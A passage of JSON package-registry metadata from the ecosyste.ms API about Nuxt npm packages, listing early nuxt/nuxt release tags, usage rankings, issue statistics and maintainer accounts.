y_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:02.500Z","dependent_packages_count":5,"downloads":12457,"downloads_period":"last-month","dependent_repos_count":424,"rankings":{"downloads":1.0550453443063874,"dependent_repos_count":0.8459715122247295,"dependent_packages_count":3.622902409528767,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.6186636805636194,"average":1.3090709541696006},"purl":"pkg:npm/%40nuxt/vue-renderer-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/vue-renderer-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/vue-renderer-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/vue-renderer-edge/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-renderer-edge/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2022-11-20T21:02:46.909Z","updated_at":"2022-11-20T21:02:46.909Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-13T16:29:06.097Z","updated_at":"2023-12-13T16:29:06.097Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096141,"name":"@nuxt/utils-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1617,"first_release_published_at":"2018-12-22T21:09:46.503Z","latest_release_published_at":"2020-06-29T00:23:10.690Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-03-21T01:05:06.074Z","created_at":"2022-04-08T10:39:36.959Z","updated_at":"2026-03-21T01:05:06.074Z","registry_url":"https://www.npmjs.com/package/@nuxt/utils-edge","install_command":"npm install @nuxt/utils-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue 